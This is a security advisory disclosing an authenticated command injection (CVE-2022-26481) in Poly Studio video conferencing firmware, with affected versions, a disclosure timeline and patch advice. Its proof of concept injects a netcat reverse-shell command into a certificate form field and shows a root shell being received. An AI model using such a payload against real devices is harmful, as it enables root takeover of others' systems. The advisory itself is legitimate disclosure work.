title: Authenticated Command Injection
             product: Poly Studio X30, Studio X50, Studio X70, G7500
  vulnerable version: 3.4.0-292042, 3.5.0-344025, 3.6.0
       fixed version: 3.7.0 or higher
          CVE number: CVE-2022-26481
              impact: critical
               found: 2021-07-14
                  by: Johannes Kruchem (Office Vienna)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company
                      Europe | Asia | North America



Vendor description:
"Experience full board-room-quality audio, and knock-your-socks-off video,
for mid-sized rooms. The Poly Studio X50 all-in-one video bar is radically
simple to use with support for leading cloud video services built right
inโ€”no PC or Mac required. Voices are crisp and clear. Video feels natural.
And wireless content sharing lets users collaborate from their devices
without cables or pucks."

Business recommendation:
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:
1) Authenticated Command Injection with Elevated Privileges (CVE-2022-26481)
An authenticated Command Injection vulnerability exists in the web interface when
creating a certificate. An attacker is able to execute commands with root privileges.

Proof of concept:
1) Authenticated Command Injection with Elevated Privileges (CVE-2022-26481)
When being authenticated:

1. In the system web interface, go to Security > Certificates.
2. Select Create Certificate Signing Request (CSR).
3. In the Certificate Details form, complete the following fields:

Common Name (CN): $(busybox nc 8888 -e /system/bin/sh)

(steps taken from

The previously started nc listener receives a connection from the camera
as root:

$ nc -lvp 8888
connect to [] from (UNKNOWN) []
$ pwd
$ whoami

Vulnerable / tested versions:
At least the following firmware versions of Poly Studio X30, Studio X50, Studio X70 and
G7500 are affected:

- 3.4.0
- 3.5.0
- 3.6.0

Vendor contact timeline:
2021-07-14: Contacting vendor through PSIRT email.
2021-07-15: Vendor sent PGP key.
2021-07-16: Advisory was sent to the vendor.
2021-07 to 2022-03: Further coordination with multiple emails and meetings.
2022-03-18: Vendor provides draft advisory.
2022-03 - 2022-06: Patch already available, waiting for vendor advisory release.
2022-06-01: Coordinated release of security advisory.

Update to firmware version 3.7.0 or higher.

The firmware can be downloaded from the vendor's support page:

This issue has been documented in the vendor's security advisory PLYTV21-09:

In order to minimize the risk of exploitation, set a strong password for the
web interface and restrict network access to the device.